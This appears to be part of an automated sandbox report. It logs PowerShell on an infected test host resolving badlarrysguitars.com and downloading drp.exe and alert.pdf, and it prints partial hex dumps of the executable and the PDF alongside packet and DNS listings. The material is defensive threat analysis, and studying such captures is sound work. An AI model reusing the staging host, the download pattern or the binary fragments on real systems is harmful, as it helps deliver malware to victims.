                                                          Dec 6, 2024 15:42:41.958400011 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.958406925 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.958451033 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.960887909 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.960947037 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.963606119 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.963689089 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.963700056 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.966869116 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.967010021 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.967017889 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.969649076 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.969711065 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.969717979 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.972547054 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.972614050 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.972625017 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.974736929 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.974802971 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.974812984 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.977792025 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.978121996 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.978153944 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.980402946 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.980489016 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.980499029 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.983634949 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.983786106 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.983794928 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.986212969 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.986274004 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.986284018 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.013902903 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.115876913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.115955114 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.115971088 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.118448019 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.118515968 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.118536949 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.168829918 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.171185970 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.171210051 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.171303034 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.171329975 CET44349794101.99.75.174192.168.2.11
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 6, 2024 15:42:01.400823116 CET192.168.2.111.1.1.10xb690Standard query (0)badlarrysguitars.comA (IP address)IN (0x0001)false
                                                          Dec 6, 2024 15:42:20.704823971 CET192.168.2.111.1.1.10x7e14Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 6, 2024 15:42:01.984782934 CET1.1.1.1192.168.2.110xb690No error (0)badlarrysguitars.com101.99.75.174A (IP address)IN (0x0001)false
                                                          Dec 6, 2024 15:42:19.105338097 CET1.1.1.1192.168.2.110x24abNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                          Dec 6, 2024 15:42:19.105338097 CET1.1.1.1192.168.2.110x24abNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                          Dec 6, 2024 15:42:20.992559910 CET1.1.1.1192.168.2.110x7e14No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.1149706101.99.75.1744437600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-06 14:42:03 UTC178OUTGET /share/drp.exe HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: badlarrysguitars.com
                                                          Connection: Keep-Alive
                                                          2024-12-06 14:42:04 UTC330INHTTP/1.1 200 OK
                                                          Date: Fri, 06 Dec 2024 14:42:03 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Content-Length: 64456
                                                          Last-Modified: Sun, 17 Nov 2024 15:37:43 GMT
                                                          Content-Disposition: inline; filename=drp.exe
                                                          Cache-Control: no-cache
                                                          ETag: "1731857863.0-64456-2350713368"
                                                          Connection: close
                                                          Content-Type: application/x-msdos-program
                                                          2024-12-06 14:42:04 UTC7862INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 65 44 8a 1f 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 06 00 00 00 00 00 00 c2 00 00 00 00 00 00 c0 11 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 10 01 00 00 04 00 00 bc 9c 01 00 02 00 00 04 92 47 40 00 00 00 00 00 c3 74 02 00 00 00 00 00 f1 f3 e9 00 00 00 00 00 a7 4a 0b 00 00 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdeD/@G@tJ
                                                          2024-12-06 14:42:04 UTC7860INData Raw: 9f ce 06 f0 a5 00 ee 52 92 fa 25 5e ea 3b e0 cb 04 5f 51 af 62 af 6f 00 6f c9 40 39 8f 2f eb f9 d2 c3 9b eb 5e 15 67 f5 5d 33 0f 25 fa 9c 6d ed f2 8d 3c 36 d1 a7 a4 c7 77 a0 df 22 62 7b 63 a2 9c 27 63 fc 4d 3e ab 3f 95 af 5d 4d 9f 92 7d 22 b3 6f 40 6f 24 bf f5 f4 b2 a4 67 62 7c 57 d6 6b 73 49 3d 03 fa d5 16 fc 9e 00 da 35 83 de 11 c0 0a 4b 00 17 ad b0 0a 80 09 60 c2 54 01 ee fd c6 b7 15 93 80 cc ee db 04 df 5e 4f 02 28 f5 65 8c 2f 8d e2 7c 27 f3 e9 fa 46 91 e4 0b e4 7e a6 75 37 f4 f6 61 79 8f 92 79 32 c1 07 e7 0f 77 8c 32 f8 6d 4c df e1 63 fb 4c f7 1e 4b 7e 4e f6 b5 0c 07 5e 3f 43 00 41 ac 3f e2 4b 79 8d be 65 17 bd fd 87 12 cd 3c 2e de 77 65 3d 8c f7 bd ec e7 d2 9e 88 f7 d1 fb ab 4c 07 5f 65 d6 8c ec 8f 3a f8 ae 49 64 f6 1d e0 4b ad e4 8f e5 be 01 7c 09
                                                          Data Ascii: R%^;_Qboo@9/^g]3%m<6w"b{c'cM>?]M}"o@o$gb|WksI=5K`T^O(e/|'F~u7ayy2w2mLcLK~N^?CA?Kye<.we=L_e:IdK|
                                                          2024-12-06 14:42:04 UTC8192INData Raw: 05 83 39 44 1f bf 5b b0 13 6f b1 15 af cf 0f b3 fb 99 86 9e 60 ee 7e b7 ca 6c 9f 5d e0 47 71 b9 72 9e 8b f5 ed 62 9d 60 6d fe 46 9a c1 b7 01 6b f9 1d 2a 97 e7 8f bd 7e a6 ac e7 86 73 b4 65 fa f7 e3 f6 dd 78 a7 1d b3 c9 86 ac ed a7 e6 f0 c9 ec 7e 66 c3 8d 56 e7 f5 27 39 b9 1f ae cd 37 e5 bd 85 d9 a9 3c 9c e0 3b 9f 32 fb 2e c3 ef 0c 15 00 01 9f e2 7e 2e e9 71 82 cf 27 f9 1c e8 55 08 7c 92 fd b3 1b 0c 01 9c 3b db 5c bb 10 00 49 00 6d a2 74 02 8a 10 60 c4 6d b3 e5 a5 fe 90 18 bb 3d e4 37 da 60 ab cf 5d da 13 03 38 d3 1b 6d d4 0c aa a0 9b af 86 37 d8 48 cc e1 e3 9a 3e 4f e5 b1 5b 67 ab 20 ab 2f 77 d8 31 c0 ef b3 53 7a 02 a9 cf f1 7e af 18 b9 dd c7 9e 3e 3b 76 5b ae d1 8f 46 72 8d b7 af de e5 bc a1 a6 69 e1 f5 b5 7c db c8 13 2e d4 11 d9 7d e5 2c ec de f3 31 7e
                                                          Data Ascii: 9D[o`~l]Gqrb`mFk*~sex~fV'97<;2.~.q'U|;\Imt`m=7`]8m7H>O[g /w1Sz~>;v[Fri|.},1~
                                                          2024-12-06 14:42:04 UTC7808INData Raw: ef ed 51 01 b8 0e 3e 6a e6 f1 8d 3c 35 ce eb 07 92 9f a4 fe 19 2f 08 02 20 af cf 9e ff b4 e7 aa 8d 7d 41 84 00 5f 98 08 39 80 db ef 06 e0 83 7d f5 ee fb c0 be 6e eb fb bb a8 95 77 07 0e e4 a0 d5 7a 05 dc c2 5b 6d 7a f6 ff 6c e5 6e d3 b6 8b dd 70 07 a8 fc 25 bb e6 62 12 08 54 c0 21 6b f2 3a 45 02 a3 d1 67 8f 85 3c f6 1c c3 67 c6 7b ff d8 38 67 73 7d 48 3c 3f 94 20 82 14 09 8c f3 9d 46 4d 80 1a 30 21 c1 ba 4d 26 24 98 f4 1a a8 81 d9 85 fa 82 39 25 7a f2 7c 08 09 16 54 02 19 54 e9 0b 81 04 2e 5c 5c ab 2f 5a 8c 24 50 0f d7 56 0d 5c b8 04 48 60 49 b3 b3 0b f1 8c e0 97 80 e7 58 9f 57 ec 65 b6 d0 6e 89 7b f7 6d 0b af 19 cd 45 3b e9 2e e0 95 7b dc c6 2b 80 8f cf e6 37 27 e7 ed 27 63 fd 39 89 dd 76 02 cf df 18 0c e7 08 e6 ed 27 cb 7a f1 2c 3e ce ee 7b c9 cf 2d bc
                                                          Data Ascii: Q>j<5/ }A_9}nwz[mzlnp%bT!k:Eg<g{8gs}H<? FM0!M&$9%z|TT.\\/Z$PV\H`IXWen{mE;.{+7''c9v'z,>{-
                                                          2024-12-06 14:42:04 UTC4544INData Raw: 0f ad 51 38 80 e0 67 e3 9c 80 0b 07 8e f8 0a c1 a1 5c c9 41 26 80 88 04 32 9d 82 22 1f e0 93 82 07 73 56 05 06 23 12 f0 04 10 56 38 32 e6 bc b1 07 2a 82 b6 5f 82 ff 2d 0b fe 0e 04 ff 2f 2d f8 5b 22 f0 f7 bc b5 27 01 fe 7d 86 4c 1c b9 b0 a5 c2 12 19 ce c8 df 37 45 00 f4 7a ea 7d f8 6f 86 6b 04 be 36 0b 54 c0 13 a0 02 9e dd 09 a1 c0 6e 7d d6 0b 10 06 18 02 a8 54 67 bd 54 09 e0 ad 84 eb 6a 20 81 1a a7 02 0c 01 04 eb f3 6b c3 55 7a be a4 17 ee b4 13 0d e6 88 a7 f2 64 86 70 26 ba f8 72 65 f6 4f 4b ce df 13 09 bf d4 82 9d 27 43 02 20 d0 53 ef 7e 85 e6 2e 3e e7 ed 1f 13 75 fc a8 a4 87 21 80 4f f2 95 13 f0 2b 9c 97 cf 00 1f ec 44 30 04 3f 90 80 fe ad 13 00 78 ff a6 f6 9a 36 fd bf 1a ff 4d ff 6b d3 3f eb 5f b5 fe 52 ff bc 03 80 d7 05 40 ec 05 ef 0c 64 b0 5f aa 82
                                                          Data Ascii: Q8g\A&2"sV#V82*_-/-["'}L7Ez}ok6Tn}TgTj kUzdp&reOK'C S~.>u!O+D0?x6Mk?_R@d_
                                                          2024-12-06 14:42:04 UTC8192INData Raw: ec 85 33 90 00 96 fa 1e 5c 51 6b 00 8e 60 47 8f 5f 50 0b e0 5f 37 68 12 80 fc 1c 13 81 9f 4f 94 02 bd fc e7 24 60 82 00 28 04 88 09 00 73 00 df 02 12 58 5b d1 a9 bf b9 b8 d5 10 c0 95 cf 35 80 e7 2c 34 25 c2 de b1 61 0b 7c 01 fe 81 b1 51 0b fc 31 06 fa 68 00 fc 8c 0a 00 30 0e e4 02 36 01 d6 5d d3 7b f9 ba 3f d7 67 c5 eb 68 7d 23 23 c6 cc 35 3d 1b a4 a9 c1 93 1e 81 30 00 f3 00 8f ef 00 12 d8 a5 4f 7f 0a 14 c0 d3 25 40 04 65 da a8 80 e7 20 0c 78 be 1a c8 a0 ca 2a 00 53 bf af b6 6d bc 62 de 7e b4 60 47 f4 ec 57 45 8b 76 aa b3 a5 3d b9 b5 96 28 e9 e5 ca ee bb ac 3e 75 f1 c9 36 de 13 09 f4 62 6d 7e b0 44 f7 84 87 85 ec 0f 97 e8 2a 67 dc c9 f7 00 c7 fb 94 dd 7f 40 26 f6 d8 fb 0b e0 0b 8f 4f 24 a0 d9 eb 5b e0 c3 f9 47 70 ff e3 52 07 fc cf 7e e1 16 f5 d9 e3 51 05
                                                          Data Ascii: 3\Qk`G_P_7hO$`(sX[5,4%a|Q1h06]{?gh}##5=0O%@e x*Smb~`GWEv=(>u6bm~D*g@&O$[GpR~Q
                                                          2024-12-06 14:42:04 UTC7808INData Raw: 4b 26 ef 03 10 b6 1d e5 9e 00 10 bc d6 96 7e 5f d2 da c2 9f dd d8 16 3e 47 89 bd 6d fb 76 43 02 b8 4b ef d5 04 74 dc ae eb b5 5d 9d 46 0d 3c b8 a1 4d 7f 8a b6 ef ba 32 92 fa 81 dc 4f 48 fe ab 9f ab 75 c9 be e7 0a 5a 5d c2 6f aa f0 fc bb 76 ef d6 43 c3 c3 7a 08 67 fc e3 c2 1f 22 81 76 22 01 f3 6f 26 94 40 75 83 20 01 4e 08 52 1c cf 9e bb 28 02 67 51 85 27 85 22 71 5f 1c dd 8f f7 2c b6 e0 bd 60 f8 ef 69 12 80 8f ae 03 05 00 61 c0 4f b6 aa 93 ef 0f 09 e0 c4 9f 59 02 38 19 14 c0 49 48 00 0f 95 71 17 5f 06 f8 27 86 52 5f b9 86 1e 4e f4 25 7a f6 d3 19 fe 78 7f 3d f6 fa 65 c1 bc 7d bf 58 87 cb 79 21 f0 df ff 03 ca ea 3b 6f cf c3 39 b2 5d 7c 5c cb 97 71 be ad ed 17 a7 80 af 7c ac 4f 60 ff 8e 91 f6 4a 26 f9 ac c7 2f 32 40 f7 c0 0f ed 33 42 fe 1f 37 02 e0 45 41 2d
                                                          Data Ascii: K&~_>GmvCKt]F<M2OHuZ]ovCzg"v"o&@u NR(gQ'"q_,`iaOY8IHq_'R_N%zx=e}Xy!;o9]|\q|O`J&/2@3B7EA-
                                                          2024-12-06 14:42:04 UTC8192INData Raw: 12 c0 70 09 c1 8f aa 09 bd fe 6d 77 dc 93 04 1c 02 45 80 45 1f 23 19 a8 df 34 4c 48 11 0e 83 36 95 47 78 0f b9 89 9c 39 85 f8 1a 08 40 41 08 a0 f2 0a e0 3f b9 1a 60 22 c0 a4 16 02 8a 81 1c 00 8e ce 7c 8d af cb e7 19 40 8b f7 04 ef 93 26 3e 23 bf c3 5d 8b 73 fc 3b a0 61 3f 00 93 40 ca 18 d0 1b c7 79 8f 7c 2f 9e 99 44 30 e9 87 3d 14 bb 21 f6 8f 12 7d ef c9 db 1f 0d 80 a9 e4 de 31 80 57 1d 8d 3c c6 4b f8 e5 48 34 66 42 8e 38 29 18 87 23 9f fa 33 43 00 fa 9a eb 91 00 f2 39 80 ff f4 b9 01 ac 14 70 58 80 e0 32 e0 5c bb d6 82 78 cd 1a 06 a1 e2 6b 77 1f 5d cb cf c4 cf 02 10 e3 f7 f0 77 89 ef 0c 5e cf f5 1a 18 e6 01 32 60 36 9d 82 e2 5a de a7 de 13 3d c3 c4 5f 65 65 a5 2e 04 02 c0 7f 8f a7 9f 7d 5e c6 fa 47 95 ce 12 a0 11 b8 55 02 80 99 3c c1 b1 92 ca b1 a8 8b f7
                                                          Data Ascii: pmwEE#4LH6Gx9@A?`"|@&>#]s;a?@y|/D0=!}1W<KH4fB8)#3C9pX2\xkw]w^2`6Z=_ee.}^GU<
                                                          2024-12-06 14:42:04 UTC3998INData Raw: 86 f7 0d 01 01 0b 05 00 30 62 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 21 30 1f 06 03 55 04 03 13 18 44 69 67 69 43 65 72 74 20 54 72 75 73 74 65 64 20 52 6f 6f 74 20 47 34 30 1e 17 0d 32 32 30 33 32 33 30 30 30 30 30 30 5a 17 0d 33 37 30 33 32 32 32 33 35 39 35 39 5a 30 63 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 17 30 15 06 03 55 04 0a 13 0e 44 69 67 69 43 65 72 74 2c 20 49 6e 63 2e 31 3b 30 39 06 03 55 04 03 13 32 44 69 67 69 43 65 72 74 20 54 72 75 73 74 65 64 20 47 34 20 52 53 41 34 30 39 36 20 53 48 41 32 35 36 20 54 69 6d 65 53 74 61 6d 70 69 6e 67 20 43 41 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d
                                                          Data Ascii: 0b10UUS10UDigiCert Inc10Uwww.digicert.com1!0UDigiCert Trusted Root G40220323000000Z370322235959Z0c10UUS10UDigiCert, Inc.1;09U2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0"0*H


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.1149717101.99.75.1744437820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-06 14:42:07 UTC180OUTGET /share/alert.pdf HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: badlarrysguitars.com
                                                          Connection: Keep-Alive
                                                          2024-12-06 14:42:08 UTC322INHTTP/1.1 200 OK
                                                          Date: Fri, 06 Dec 2024 14:42:08 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Content-Length: 126079
                                                          Last-Modified: Fri, 15 Nov 2024 19:44:32 GMT
                                                          Content-Disposition: inline; filename=alert.pdf
                                                          Cache-Control: no-cache
                                                          ETag: "1731699872.0-126079-2713651938"
                                                          Connection: close
                                                          Content-Type: application/pdf
                                                          2024-12-06 14:42:08 UTC7870INData Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 20 0a 3c 3c 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 48 65 69 67 68 74 20 31 30 38 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0a 2f 57 69 64 74 68 20 38 35 31 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 4c 65 6e 67 74 68 20 31 32 35 32 32 31 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c ec dd 65 d4 24 d5 d5 b7 71 5c 83 7b 08 04 09 ee 16 dc dd 09 ee 0e 83 c3 e0 ce e0 1a dc dd 5d 07 77 d7 e0 6e 01 82 43 70 12 20 79 12 fa fd ad de 2f 67 55 da ee 1e 63 48 66 5f 1f 66 f5 dd 5d 75 64 9f 2d ff 53 55 dd 53 ab 25 49 92 24 49 92 24 49 92
                                                          Data Ascii: %PDF-1.7%1 0 obj <</ColorSpace /DeviceRGB/Subtype /Image/Height 1083/Filter /FlateDecode/Type /XObject/Width 851/BitsPerComponent 8/Length 125221>>streamxe$q\{]wnCp y/gUcHf_f]ud-SUS%I$I$I
                                                          2024-12-06 14:42:08 UTC7860INData Raw: b9 34 cd 26 e2 8a ee 15 26 3a 32 ce 96 d7 c7 c4 38 75 6a 3c 06 69 16 4a 00 d3 99 8b 5c c1 a3 bc 2e cf 32 c9 c3 0c c2 aa 5c 7a cd 35 d7 94 d5 4d c7 29 1a 57 a4 c2 da 2f be f8 a2 04 c2 0e 4a 8f 14 a4 dc c8 a8 5c da 31 8e a4 eb d8 47 c0 b2 6d ad 2e fc 8c 79 81 05 16 50 b3 1e 7e f8 61 f9 4a 1a 51 86 2e bb ec 32 66 d9 63 8f 3d 34 5b b4 5c 03 2c 20 84 e5 1c 21 e0 b5 da 21 e2 24 9f 98 f2 b1 c7 1e cb a4 d2 8b 4e 7d 6a 6c c2 f6 92 4b 2e 61 0a 8d 33 c5 31 c7 1c a3 0b 06 51 35 74 5a b4 68 15 07 6b 96 05 14 94 07 ea 48 a7 d2 57 08 3f b1 7f ca 29 a7 18 80 c4 cb 74 3c 44 da 94 1f 4c 84 7d 0c 5b a4 4b d4 5e 18 12 e7 91 d8 29 c3 7b ef bd 57 bf 54 19 67 88 30 e7 45 b6 00 96 f5 e0 83 0f f6 11 53 58 8e 59 66 99 45 bd 90 a8 69 57 f9 e1 b9 e7 9e 23 0e d9 9f 7c 22 84 0c db 91
                                                          Data Ascii: 4&&:28uj<iJ\.2\z5M)W/J\1Gm.yP~aJQ.2fc=4[\, !!$N}jlK.a31Q5tZhkHW?)t<DL}[K^){WTg0ESXYfEiW#|"
                                                          2024-12-06 14:42:08 UTC8192INData Raw: 15 c5 3e 31 da f9 e7 9f 7f bf fd f6 8b 7e 63 3a 31 80 ce 63 a8 9a ae c1 3e 65 99 1c a0 86 76 2f fc 62 a5 8a ab c7 60 ca 8e 23 ac 87 10 7e c7 1f 7f 7c 58 2c 8c d9 60 8a 6a 74 34 4f a1 08 bf b2 ca 9d 2d 1c 23 d1 5d d8 30 0c 58 6d b9 c1 eb bc 6f ee 65 d1 cb 61 4e 2f b6 0d ca 00 1c df f0 51 35 70 08 86 1e 85 5f 4b 3f 2f c9 ad 61 2e 55 23 b7 5c 47 9d 3a 2b 0e 6e 99 30 ab 07 97 ae ab 99 ea fb 3a e5 ac 76 0e 13 03 f0 29 2b 45 23 0d f1 1b 0b da d0 78 3b aa 7e 5e 35 69 d4 88 7f d6 69 e9 cf c5 69 1d f6 f9 e7 9f f7 93 f0 eb 1c aa d5 b2 d2 59 f8 19 f9 6e bb ed 36 fb ec b3 7f fa e9 a7 c5 44 ed 16 a8 1d ba 8b e3 7b f4 6a 9f 6e bc f1 c6 8a e6 3b ef bc d3 b2 bb aa 43 1a 7c d8 bf 5a 13 cb c4 ab 09 27 4c ed dc f2 51 73 7e a8 46 44 d5 43 ba 89 b2 6a 2e 0d 2f 8d 76 50 0d fc
                                                          Data Ascii: >1~c:1c>ev/b`#~|X,`jt4O-#]0XmoeaN/Q5p_K?/a.U#\G:+n0:v)+E#x;~^5iiiYn6D{jn;C|Z'LQs~FDCj./vP
                                                          2024-12-06 14:42:08 UTC7808INData Raw: e6 29 44 c8 37 b7 d0 ee 4b a3 cd 3d d6 2a 7e 15 ab 53 cd 12 d5 04 52 1d 40 73 17 d5 d8 69 68 bf 21 70 7a 8c cd 0e 7e 1e ee 11 16 68 58 e2 b2 fa 0d 4b 4c f5 6d b0 c1 06 65 78 d5 8f c2 7a d5 89 94 ae ab 5e 1d eb 5e b5 61 4b 0f 6c 76 b9 86 15 ac 5a af 73 14 54 f3 43 0c b8 8c a1 a5 cf 7c f7 9f ff 91 4a e9 c8 61 cd c9 bc d9 9e d5 ff 4d a9 43 a8 16 0b c7 47 1d dc ac 56 59 f4 ea 7f a5 51 cd ae 1d a6 5f ed 2b 26 db 5c da ba ef ae 61 99 5a d6 c4 6a b5 2a 1d 11 7e 34 61 ec b0 5a 0e bb a1 2c 56 73 54 8f 51 56 bc 25 d6 ba 79 8d 7c b4 ed b6 db da 39 96 9b b3 ed d0 4e 29 3a 0d 1e ee cd aa 6f 74 ae c5 c5 b1 9b 0d d2 f0 5f 9f f4 f8 df 03 b5 5c e8 86 4c 1e ef fc 37 fe 4f 88 49 92 0c 99 3c f3 cc 33 2b ad b4 d2 3b ef bc 33 b8 07 92 f4 40 08 bf c1 3d 8a e4 bf 8f 22 fc 7e e6
                                                          Data Ascii: )D7K=*~SR@sih!pz~hXKLmexz^^aKlvZsTC|JaMCGVYQ_+&\aZj*~4aZ,VsTQV%y|9N):ot_\L7OI<3+;3@="~
                                                          2024-12-06 14:42:08 UTC4544INData Raw: 27 63 b4 6c 56 51 10 4a e5 da d4 b9 e7 9e 2b ab c7 f7 58 09 4b 8d c4 77 2a 75 c1 ab 0d 20 84 9f 7c c5 af 4c 33 4a 06 ad 12 5f fd 16 6e dd 0b 3f 0e 63 fa f1 9d c1 5a 3d 70 b6 de 7a 6b 89 68 c0 85 1f 4f 58 74 d1 45 e3 8a 7d 3c fe 4a 15 6b 59 6e 91 54 2d b1 f4 1b 21 23 a0 ec b9 e4 ba c8 c6 16 57 9e 91 6d 22 7d b1 27 07 5e 71 c5 15 b5 29 57 08 f3 b8 59 cc 02 f1 14 74 3b e1 67 8d bc 13 09 24 be 06 ab 38 8e 34 d2 48 c7 1c 73 4c cb cd 1d 07 30 72 d3 89 2f 32 c8 c3 52 77 fc 54 54 14 17 06 97 3a 96 5c 72 c9 a8 ec ec ac 74 3a 20 ae f8 49 e0 86 cd ce 61 37 ab a9 a9 f2 13 31 55 42 f8 31 63 0c 5b d6 62 a5 d8 00 1a e7 25 97 5c c2 a9 aa b7 7a cb cf b9 48 59 ba 58 63 8d 35 e2 46 43 7c 17 fe 8a 2b ae 70 96 d1 da 29 08 8d fd f7 df 3f be dc d1 af c2 2f 9e 4b 67 55 d9 43 ef
                                                          Data Ascii: 'clVQJ+XKw*u |L3J_n?cZ=pzkhOXtE}<JkYnT-!#Wm"}'^q)WYt;g$84HsL0r/2RwTT:\rt: Ia71UB1c[b%\zHYXc5FC|+p)?/KgUC
                                                          2024-12-06 14:42:08 UTC8192INData Raw: 49 8b c2 b1 46 e6 35 ff fc f3 6b 84 c5 f4 7e e0 81 07 46 ef 4e 24 db 7c 44 35 75 16 7e 1a 27 e7 8a dd 8a f0 ab fd e7 ad 5e 4a 86 dc d2 ce 2b af bc 12 b3 33 98 99 66 9a c9 fa 36 98 45 64 19 09 a5 14 06 0c 29 cb 4f 08 a7 5a fd 56 2f 65 c5 21 6b 4d d8 91 89 62 aa 3e a2 cf 16 c0 72 73 63 63 e3 93 c6 79 cf 3d f7 c4 91 1c 89 3b 51 74 26 d5 8d f0 5b 79 e5 95 63 53 d6 40 08 3f ae 78 ed b5 d7 c6 68 2d 96 39 ae ba ea aa fc 21 84 1f 83 47 56 d1 1a 4b 3a 58 0a 2a a9 c3 f0 f8 cf 7d f7 dd 17 b7 7a 2d b7 de 7d d4 4e f8 59 14 49 8c 03 47 0b 66 ba c7 1e 7b d8 2f d8 c7 35 0f 2f 49 92 64 88 42 75 96 81 65 ef f2 8e cd f2 dc 73 cf bd c6 1a 6b c8 b7 e4 87 42 10 97 7a 6a f5 ef 1e 4a 9e d4 54 91 3a 51 40 e5 7f e5 a3 2a fc e4 f3 3f fc e1 0f 72 af 7a 7a c3 4f fc f1 8f 7f 8c 62 44
                                                          Data Ascii: IF5k~FN$|D5u~'^J+3f6Ed)OZV/e!kMb>rsccy=;Qt&[ycS@?xh-9!GVK:X*}z-}NYIGf{/5/IdBueskBzjJT:Q@*?rzzObD
